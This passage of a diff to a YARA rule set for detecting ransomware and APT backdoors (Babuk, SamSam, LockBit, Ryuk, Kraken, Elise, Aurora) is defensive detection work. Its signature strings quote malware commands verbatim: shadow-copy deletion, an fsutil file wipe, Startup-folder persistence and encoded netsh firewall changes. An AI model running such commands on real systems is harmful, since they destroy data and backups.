76 07 bb ff ff } - - condition: - ( uint16(0)==0x5a4d and filesize <2000KB and (6 of them ) and all of ($op*)) or ( all of them ) -} -rule TRELLIX_ARC_Ransom_Babuk : RANSOM T1027 T1083 T1057 T1082 T1129 T1490 T1543_003 FILE -{ - meta: - description = "Rule to detect Babuk Locker" - author = "TS @ McAfee ATR" - id = "7c0a3b4e-90aa-5442-aa5e-1a7fcae9bec8" - date = "2021-01-19" - modified = "2021-02-24" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_BabukLocker_Jan2021.yar#L1-L25" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "e10713a4a5f635767dcd54d609bed977" - logic_hash = "123cebd1c2e66f3e91ee235cb9288df63dfaeba02e6df45f896cb50f38851a8f" - score = 75 - quality = 70 - tags = "RANSOM, T1027, T1083, T1057, T1082, T1129, T1490, T1543.003, FILE" - rule_version = "v2" - malware_family = "Ransom:Win/Babuk" - malware_type = "Ransom" - mitre_attack = "T1027, T1083, T1057, T1082, T1129, T1490, T1543.003" - - strings: - $s1 = {005C0048006F007700200054006F00200052006500730074006F0072006500200059006F00750072002000460069006C00650073002E007400780074} - $s2 = "delete shadows /all /quiet" fullword wide - $pattern1 = {006D656D74617300006D65706F63730000736F70686F730000766565616D0000006261636B7570000047785673730000004778426C7200000047784657440000004778435644000000477843494D67720044656657617463680000000063634576744D67720000000063635365744D677200000000536176526F616D005254567363616E0051424643536572766963650051424944505365727669636500000000496E747569742E517569636B426F6F6B732E46435300} - $pattern2 = {004163725363683253766300004163726F6E69734167656E74000000004341534144324457656253766300000043414152435570646174655376630000730071} - $pattern3 = {FFB0154000C78584FDFFFFB8154000C78588FDFFFFC0154000C7858CFDFFFFC8154000C78590FDFFFFD0154000C78594FDFFFFD8154000C78598FDFFFFE0154000C7859CFDFFFFE8154000C785A0FDFFFFF0154000C785A4FDFFFFF8154000C785A8FDFFFF00164000C785ACFDFFFF08164000C785B0FDFFFF10164000C785B4FDFFFF18164000C785B8FDFFFF20164000C785BCFDFFFF28164000C785C0FDFFFF30164000C785C4FDFFFF38164000C785C8FDFFFF40164000C785CCFDFFFF48164000C785D0FDFFFF50164000C785D4FDFFFF581640} - $pattern4 = {400010104000181040002010400028104000301040003810400040104000481040005010400058104000601040006C10400078104000841040008C10400094104000A0104000B0104000C8104000DC104000E8104000F01040000011400008114000181140002411400038114000501140005C11400064114000741140008C114000A8114000C0114000E0114000F4114000101240002812400034124000441240005412400064124000741240008C124000A0124000B8124000D4124000EC1240000C1340002813400054134000741340008C134000A4134000C4134000E8134000FC134000141440003C144000501440006C144000881440009C144000B4144000CC144000E8144000FC144000141540003415400048154000601540007815} - - condition: - filesize >=15KB and filesize <=90KB and 1 of ($s*) and 3 of ($pattern*) -} -import "pe" - -rule TRELLIX_ARC_Samsamransom2016 : RANSOMWARE FILE -{ - meta: - description = "No description has been set in the source file - Trellix ARC" - author = "Christiaan Beek | McAfee ATR Team" - id = "1c7985d0-d01c-52f7-8819-e038ccc01212" - date = "2018-01-25" - modified = "2020-08-14" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_SamSam.yar#L3-L52" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "9e8034ec0ded82ad82b625d6d1b9918761decef0fd42a253722cdc620b355e1a" - score = 75 - quality = 68 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/SamSam" - actor_type = "Cybercrime" - actor_group = "Unknown" - hash1 = "45e00fe90c8aa8578fce2b305840e368d62578c77e352974da6b8f8bc895d75b" - - strings: - $x1 = "Could not list processes locking resource. Failed to get size of result." fullword wide - $s2 = "Could not list processes locking resource." fullword wide - $s3 = "samsam.del.exe" fullword ascii - $s4 = "samsam.exe" fullword wide - $s5 = "RM_UNIQUE_PROCESS" fullword ascii - $s6 = "KillProcessWithWait" fullword ascii - $s7 = "killOpenedProcessTree" fullword ascii - $s8 = "RM_PROCESS_INFO" fullword ascii - $s9 = "Exception caught in process: {0}" fullword wide - $s10 = "Could not begin restart session. Unable to determine file locker." fullword wide - $s11 = "samsam.Properties.Resources.resources" fullword ascii - $s12 = "EncryptStringToBytes" fullword ascii - $s13 = "recursivegetfiles" fullword ascii - $s14 = "RSAEncryptBytes" fullword ascii - $s15 = "encryptFile" fullword ascii - $s16 = "samsam.Properties.Resources" fullword wide - $s17 = "TSSessionId" fullword ascii - $s18 = "Could not register resource." fullword wide - $s19 = "<recursivegetfiles>b__0" fullword ascii - $s20 = "create_from_resource" fullword ascii - $op0 = { 96 00 e0 00 29 00 0b 00 34 23 } - $op1 = { 96 00 12 04 f9 00 34 00 6c 2c } - $op2 = { 72 a5 0a 00 70 a2 06 20 94 } - - condition: - ( uint16(0)==0x5a4d and filesize <700KB and pe.imphash()=="f34d5f2d4577ed6d9ceec516c1f5a744" and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) -} -import "pe" - -rule TRELLIX_ARC_Samsam_Ransomware_Latest : RANSOMWARE FILE -{ - meta: - description = "Latest SamSA ransomware samples" - author = "Christiaan Beek" - id = "716b9282-013e-5194-8518-2fa1a4007095" - date = "2018-01-23" - modified = "2020-08-14" - reference = "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_SamSam.yar#L54-L105" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "88e344977bf6451e15fe202d65471a5f75d22370050fe6ba4dfa2c2d0fae7828" - logic_hash = "06703479795fdef64813471f11b275df544c90d5bcece4817d415cd504d7b317" - score = 50 - quality = 68 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/SamSam" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $s1 = "bedf08175d319a2f879fe720032d11e5" fullword wide - $s2 = "ksdghksdghkddgdfgdfgfd" fullword ascii - $s3 = "osieyrgvbsgnhkflkstesadfakdhaksjfgyjqqwgjrwgehjgfdjgdffg" fullword ascii - $s4 = "5c2d376c976669efaf9cb107f5a83d0c" fullword wide - $s5 = "B917754BCFE717EB4F7CE04A5B11A6351EEC5015" fullword ascii - $s6 = "f99e47c1d4ccb2b103f5f730f8eb598a" fullword wide - $s7 = "d2db284217a6e5596913e2e1a5b2672f" fullword wide - $s8 = "0bddb8acd38f6da118f47243af48d8af" fullword wide - $s9 = "f73623dcb4f62b0e5b9b4d83e1ee4323" fullword wide - $s10 = "916ab48e32e904b8e1b87b7e3ced6d55" fullword wide - $s11 = "c6e61622dc51e17195e4df6e359218a2" fullword wide - $s12 = "2a9e8d549af13031f6bf7807242ce27f" fullword wide - $s13 = "e3208957ad76d2f2e249276410744b29" fullword wide - $s14 = "b4d28bbd65da97431f494dd7741bee70" fullword wide - $s15 = "81ee346489c272f456f2b17d96365c34" fullword wide - $s16 = "94682debc6f156b7e90e0d6dc772734d" fullword wide - $s17 = "6943e17a989f11af750ea0441a713b89" fullword wide - $s18 = "b1c7e24b315ff9c73a9a89afac5286be" fullword wide - $s19 = "90928fd1250435589cc0150849bc0cff" fullword wide - $s20 = "67da807268764a7badc4904df351932e" fullword wide - $op0 = { 30 01 00 2b 68 79 33 38 68 34 77 65 36 34 74 72 } - $op1 = { 01 00 b2 04 00 00 01 00 84 } - $op2 = { 68 09 00 00 38 66 00 00 23 55 53 00 a0 6f 00 00 } - - condition: - ( uint16(0)==0x5a4d and filesize <100KB and pe.imphash()=="f34d5f2d4577ed6d9ceec516c1f5a744" and (8 of them ) and all of ($op*)) or ( all of them ) -} -rule TRELLIX_ARC_Loocipher_Ransomware : RANSOMWARE FILE -{ - meta: - description = "Rule to detect Loocipher ransomware" - author = "Marc Rivero | McAfee ATR Team" - id = "d18efe09-4b04-5089-84f8-aead63fc19bb" - date = "2019-12-05" - modified = "2020-08-14" - reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Loocipher.yar#L1-L46" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "7720aa6eb206e589493e440fec8690ceef9e70b5e6712a9fec9208c03cac7ff0" - logic_hash = "36e452c34fd9bbb521f5422bffdbb71991de66f3faa29292dc3f27c8d7e1f9ba" - score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Loocipher" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $x1 = "c:\\users\\usuario\\desktop\\cryptolib\\gfpcrypt.h" fullword ascii - $x2 = "c:\\users\\usuario\\desktop\\cryptolib\\eccrypto.h" fullword ascii - $s3 = "c:\\users\\usuario\\desktop\\cryptolib\\gf2n.h" fullword ascii - $s4 = "c:\\users\\usuario\\desktop\\cryptolib\\queue.h" fullword ascii - $s5 = "ThreadUserTimer: GetThreadTimes failed with error " fullword ascii - $s6 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator *" fullword wide - $s7 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::operator +=" fullword wide - $s8 = "std::basic_string<unsigned short,struct std::char_traits<unsigned short>,class std::allocator<unsigned short> >::operator []" fullword wide - $s9 = "std::vector<struct CryptoPP::ProjectivePoint,class std::allocator<struct CryptoPP::ProjectivePoint> >::operator []" fullword wide - $s10 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator *" fullword wide - $s11 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::operator +=" fullword wide - $s12 = "std::vector<struct CryptoPP::WindowSlider,class std::allocator<struct CryptoPP::WindowSlider> >::operator []" fullword wide - $s13 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator ++" fullword wide - $s14 = "std::istreambuf_iterator<char,struct std::char_traits<char> >::operator *" fullword wide - $s15 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<struct CryptoPP::ProjectivePoint> > >::_Compat" fullword wide - $s16 = "std::vector<class CryptoPP::PolynomialMod2,class std::allocator<class CryptoPP::PolynomialMod2> >::operator []" fullword wide - $s17 = "DL_ElgamalLikeSignatureAlgorithm: this signature scheme does not support message recovery" fullword ascii - $s18 = "std::vector<struct CryptoPP::ECPPoint,class std::allocator<struct CryptoPP::ECPPoint> >::operator []" fullword wide - $s19 = "std::vector<struct CryptoPP::EC2NPoint,class std::allocator<struct CryptoPP::EC2NPoint> >::operator []" fullword wide - $s20 = "std::_Vector_const_iterator<class std::_Vector_val<struct std::_Simple_types<class CryptoPP::Integer> > >::_Compat" fullword wide - - condition: - ( uint16(0)==0x5a4d and filesize <17000KB and (1 of ($x*) and 4 of them )) or ( all of them ) -} -rule TRELLIX_ARC_Lockbit2_Jul21 : FILE -{ - meta: - description = "simple rule to detect latest Lockbit ransomware Jul 2021" - author = "CB @ ATR" - id = "22b423df-ae5c-5672-95be-333b13791fc6" - date = "2021-07-28" - modified = "2021-07-28" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Lockbit2.yar#L1-L25" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "b3ed7d7c72b7585877293f586bae5ec7b0135b09d518b4e4b08f64e60db5a159" - score = 50 - quality = 70 - tags = "FILE" - version = "v1" - hash1 = "f32e9fb8b1ea73f0a71f3edaebb7f2b242e72d2a4826d6b2744ad3d830671202" - hash2 = "dd8fe3966ab4d2d6215c63b3ac7abf4673d9c19f2d9f35a6bf247922c642ec2d" - - strings: - $seq1 = " /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 \"%s\" & Del /f /q \"%s\"" fullword wide - $seq2 = "\"C:\\Windows\\system32\\mshta.exe\" \"%s\"" fullword wide - $p1 = "C:\\windows\\system32\\%X%X%X.ico" fullword wide - $p2 = "\\??\\C:\\windows\\system32\\%X%X%X.ico" fullword wide - $p3 = "\\Registry\\Machine\\Software\\Classes\\Lockbit\\shell\\Open\\Command" fullword wide - $p4 = "use ToxID: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7" fullword wide - $p5 = "https://tox.chat/download.html" fullword wide - $p6 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration" fullword wide - $p7 = "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion" fullword wide - $p8 = "\\LockBit_Ransomware.hta" fullword wide - - condition: - ( uint16(0)==0x5a4d and filesize <1000KB and (1 of ($seq*) and 4 of them )) or ( all of them ) -} -rule TRELLIX_ARC_Ryuk_Ransomware : RANSOMWARE FILE -{ - meta: - description = "Ryuk Ransomware hunting rule" - author = "Christiaan Beek - McAfee ATR team" - id = "d3e67e26-3b34-5c28-a1c0-c4aeacd49df9" - date = "2019-04-25" - modified = "2021-07-12" - reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Ryuk.yar#L1-L47" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "43c0be708fa8a388dce6e1dd721e24329b5b08a942d99e9b2631c90155790c4b" - score = 50 - quality = 70 - tags = "RANSOMWARE, FILE" - rule_version = "v2" - malware_type = "ransomware" - malware_family = "Ransom:W32/Ryuk" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $x1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii - $x2 = "\\System32\\cmd.exe" fullword wide - $s1 = "C:\\Users\\Admin\\Documents\\Visual Studio 2015\\Projects\\ConsoleApplication54new crypted" ascii - $s2 = "fg4tgf4f3.dll" fullword wide - $s3 = "lsaas.exe" fullword wide - $s4 = "\\Documents and Settings\\Default User\\sys" fullword wide - $s5 = "\\Documents and Settings\\Default User\\finish" fullword wide - $s6 = "\\users\\Public\\sys" fullword wide - $s7 = "\\users\\Public\\finish" fullword wide - $s8 = "You will receive btc address for payment in the reply letter" fullword ascii - $s9 = "hrmlog" fullword wide - $s10 = "No system is safe" fullword ascii - $s11 = "keystorage2" fullword wide - $s12 = "klnagent" fullword wide - $s13 = "sqbcoreservice" fullword wide - $s14 = "tbirdconfig" fullword wide - $s15 = "taskkill" fullword wide - $op0 = { 8b 40 10 89 44 24 34 c7 84 24 c4 } - $op1 = { c7 44 24 34 00 40 00 00 c7 44 24 38 01 } - - condition: - ( uint16(0)==0x5a4d and filesize <400KB and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) -} -rule TRELLIX_ARC_RANSOM_RYUK_May2021 : RANSOMWARE FILE -{ - meta: - description = "Rule to detect latest May 2021 compiled Ryuk variant" - author = "Marc Elias | McAfee ATR Team" - id = "6e415a9e-7373-50a8-ad57-f95220faed9c" - date = "2021-05-21" - modified = "2021-07-12" - reference = "https://github.com/advanced-threat-research/Yara-Rules/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Ryuk.yar#L91-L113" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "8f368b029a3a5517cb133529274834585d087a2d3a5875d03ea38e5774019c8a" - logic_hash = "b379c1182e60ce8c777668386d8cbd08350dd2363770dec56502bf44aaf5d7f6" - score = 50 - quality = 70 - tags = "RANSOMWARE, FILE" - version = "0.1" - - strings: - $ryuk_filemarker = "RYUKTM" fullword wide ascii - $sleep_constants = { 68 F0 49 02 00 FF (15|D1) [0-4] 68 ?? ?? ?? ?? 6A 01 } - $icmp_echo_constants = { 68 A4 06 00 00 6A 44 8D [1-6] 5? 6A 00 6A 20 [5-20] FF 15 } - - condition: - uint16(0)==0x5a4d and uint32( uint32(0x3C))==0x00004550 and filesize <200KB and ($ryuk_filemarker or ($sleep_constants and $icmp_echo_constants)) -} -rule TRELLIX_ARC_Locdoor_Ransomware : RANSOMWARE FILE -{ - meta: - description = "Rule to detect Locdoor/DryCry" - author = "Marc Rivero | McAfee ATR Team" - id = "d855d7fd-a1e3-561e-906e-103752285b0f" - date = "2018-09-02" - modified = "2020-08-14" - reference = "https://twitter.com/leotpsc/status/1036180615744376832" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_locdoor.yar#L1-L32" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "0000c55f7cdbbad9bacba0e79637696f3bfeb95a5f71dfa0b398bc77a207eb41" - logic_hash = "c9519279a929feedae2bab58cd0de91f6c447827fa59afa927726fde84d21e1c" - score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Locdoor" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $s1 = "copy \"Locdoor.exe\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\temp00000000.exe\"" fullword ascii - $s2 = "copy wscript.vbs C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\wscript.vbs" fullword ascii - $s3 = "!! Your computer's important files have been encrypted! Your computer's important files have been encrypted!" fullword ascii - $s4 = "echo CreateObject(\"SAPI.SpVoice\").Speak \"Your computer's important files have been encrypted! " fullword ascii - $s5 = "! Your computer's important files have been encrypted! " fullword ascii - $s7 = "This program is not supported on your operating system." fullword ascii - $s8 = "echo Your computer's files have been encrypted to Locdoor Ransomware! To make a recovery go to localbitcoins.com and create a wa" ascii - $s9 = "Please enter the password." fullword ascii - - condition: - ( uint16(0)==0x5a4d and filesize <600KB) and all of them -} -rule TRELLIX_ARC_Clop_Ransom_Note : RANSOMWARE FILE -{ - meta: - description = "Rule to detect Clop Ransomware Note" - author = "Marc Rivero | McAfee ATR Team" - id = "b18e4d4d-aa38-5009-a31b-ed038c5bd4f9" - date = "2019-08-01" - modified = "2020-08-14" - reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_ClopRansomNote.yar#L1-L34" - license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "a90862e9dc59b1a8f38b777b4f529d5de740d0f49175813cae64f10ca9677826" - score = 75 - quality = 70 - tags = "RANSOMWARE, FILE" - rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Clop" - actor_type = "Cybercrime" - actor_group = "Unknown" - - strings: - $s1 = "If you want to restore your files write to emails" fullword ascii - $s2 = "All files on each host in the network have been encrypted with a strong algorithm." fullword ascii - $s3 = "Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover." fullword ascii - $s4 = "You will receive decrypted samples and our conditions how to get the decoder." fullword ascii - $s5 = "DO NOT RENAME OR MOVE the encrypted and readme files." fullword ascii - $s6 = "(Less than 6 Mb each, non-archived and your files should not contain valuable information" fullword ascii - $s7 = "We exclusively have decryption software for your situation" fullword ascii - $s8 = "Do not rename encrypted files." fullword ascii - $s9 = "DO NOT DELETE readme files." fullword ascii - $s10 = "Nothing personal just business" fullword ascii - $s11 = "eqaltech.su" fullword ascii + $s1 = "DropperBackdoor.Newtonsoft.Json.dll" fullword wide + $s2 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide + $s3 = "DropperBackdoor.exe" fullword wide + $s4 = "get_ProcessExtensionDataNames" fullword ascii + $s5 = "get_ProcessDictionaryKeys" fullword ascii + $s6 = "https://www.newtonsoft.com/json 0" fullword ascii condition: - ( uint16(0)==0x6f59) and filesize <10KB and all of them + uint16(0)==0x5a4d and filesize <1000KB and all of them } -rule TRELLIX_ARC_Kraken_Cryptor_Ransomware_Loader : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Elise_Pdb : BACKDOOR FILE { meta: - description = "Rule to detect the Kraken Cryptor Ransomware loader" + description = "Rule to detect Elise APT based on the PDB reference" author = "Marc Rivero | McAfee ATR Team" - id = "e6bfa30b-6565-5d03-8f4d-96fc2b6a1c11" - date = "2018-09-30" + id = "cc8dd203-baad-5800-ba2c-f9c47d8ca6f0" + date = "2017-05-31" modified = "2020-08-14" - reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Kraken.yar#L1-L30" + reference = "https://attack.mitre.org/software/S0081/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_elise_pdb.yar#L1-L29" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd" - logic_hash = "9e252a3ba7f6bf861ea7563461a1420959dfb0f5b7c3f6071150d03422504539" + hash = "b426dbe0f281fe44495c47b35c0fb61b28558b5c8d9418876e22ec3de4df9e7b" + logic_hash = "bb7eee8082aa0f6634a8c4cdb9cbe0e2a7f00b97e48609c81a21bdaac64a5496" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Kraken" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Elise" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $pdb = "C:\\Users\\Krypton\\source\\repos\\UAC\\UAC\\obj\\Release\\UAC.pdb" fullword ascii - $s2 = "SOFTWARE\\Classes\\mscfile\\shell\\open\\command" fullword wide - $s3 = "public_key" fullword ascii - $s4 = "KRAKEN DECRYPTOR" ascii - $s5 = "UNIQUE KEY" fullword ascii + $pdb = "\\lstudio\\projects\\lotus\\elise\\Release\\EliseDLL\\i386\\EliseDLL.pdb" + $pdb1 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\SetElise.pdb" + $pdb2 = "\\lstudio\\projects\\lotus\\elise\\Release\\SetElise\\i386\\SetElise.pdb" + $pdb3 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\Uninstaller.pdb" + $pdb4 = "\\lstudio\\projects\\lotus\\evora\\Release\\EvoraDLL\\i386\\EvoraDLL.pdb" condition: - uint16(0)==0x5a4d and filesize <600KB and $pdb or all of ($s*) + uint16(0)==0x5a4d and filesize <50KB and any of them } -rule TRELLIX_ARC_Kraken_Cryptor_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Apt_Aurora_Pdb_Samples : BACKDOOR FILE { meta: - description = "Rule to detect the Kraken Cryptor Ransomware" + description = "Aurora APT Malware 2006-2010" author = "Marc Rivero | McAfee ATR Team" - id = "7e1e5fa8-6d87-5e64-a8d4-4dae55ab76ca" - date = "2018-09-30" + id = "51b080b7-671b-592b-ba52-7fdd0ddf0294" + date = "2010-01-11" modified = "2020-08-14" - reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Kraken.yar#L32-L64" + reference = "https://en.wikipedia.org/wiki/Operation_Aurora" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_operation_aurora.yar#L1-L26" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd" - logic_hash = "2ad7f0bf6110eab79e0f9541c49ae44089ebca3f91ffa80de874d60d5a7ed266" + hash = "ce7debbcf1ca3a390083fe5753f231e632017ca041dfa662ad56095a500f2364" + logic_hash = "5791ae7b96f2b59d0cca1ab97455bb4745edad8980ac4aff22aa36e0bc4f240e" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Kraken" + malware_type = "backdoor" + malware_family = "Backdoor:W32/Aurora" actor_type = "Cybercrime" actor_group = "Unknown" strings: - $s1 = "Kraken Cryptor" fullword ascii nocase - $s2 = "support_email" fullword ascii - $fw1 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii - $fw2 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii - $fw3 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii - $fw4 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii - $uac = "<!--<requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />--> " fullword ascii + $pdb = "\\AuroraVNC\\VedioDriver\\Release\\VedioDriver.pdb" + $pdb1 = "\\Aurora_Src\\AuroraVNC\\Avc\\Release\\AVC.pdb" condition: - uint16(0)==0x5a4d and filesize <600KB and all of ($fw*) or all of ($s*) or $uac + uint16(0)==0x5a4d and filesize <150KB and any of them } -rule TRELLIX_ARC_Ransom_Note_Kraken_Cryptor_Ransomware : RANSOMWARE FILE +rule TRELLIX_ARC_Troy_Malware_Campaign_Pdb : BACKDOOR FILE { meta: - description = "Rule to detect the ransom note delivered by Kraken Cryptor Ransomware" + description = "Rule to detect the Operation Troy based on the PDB" author = "Marc Rivero | McAfee ATR Team" - id = "dec9d364-daf9-5a1d-8e72-ed4dd2aeecdf" - date = "2018-09-30" + id = "c1fc5b9c-104f-5d07-86ee-5a54d9731f04" + date = "2013-06-23" modified = "2020-08-14" - reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/" - source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Kraken.yar#L66-L108" + reference = "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/APT/APT_operation_troy.yar#L1-L26" license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" - logic_hash = "d4acdf0716320b0f757b8dbc97bb9d407460b2d69dc8e12292539e823be0f57d" + hash = "2ca6b7e9488c1e9f39392e696704ad3f2b82069e35bc8001d620024ebbf2d65a" + logic_hash = "a64b4aa082c45d1753ad30ba2f67df0ef5b7658c3c99e031ef747eb4e6c7bb00" score = 75 quality = 70 - tags = "RANSOMWARE, FILE" + tags = "BACKDOOR, FILE" rule_version = "v1" - malware_type = "ransomware" - malware_family = "Ransom:W32/Kraken" - actor_type = "Cybercrime" + malware_type = "backdoor" + malware_family = "Backdoor:W32/OperationTroy" + actor_type = "Apt" actor_group = "Unknown" strings: - $s1 = "No way to recovery your files without \"KRAKEN DECRYPTOR\" software and your computer \"UNIQUE KEY\"!" fullword ascii - $s2 = "Are you want to decrypt all of your encrypted files? If yes! You need to pay for decryption service to us!" 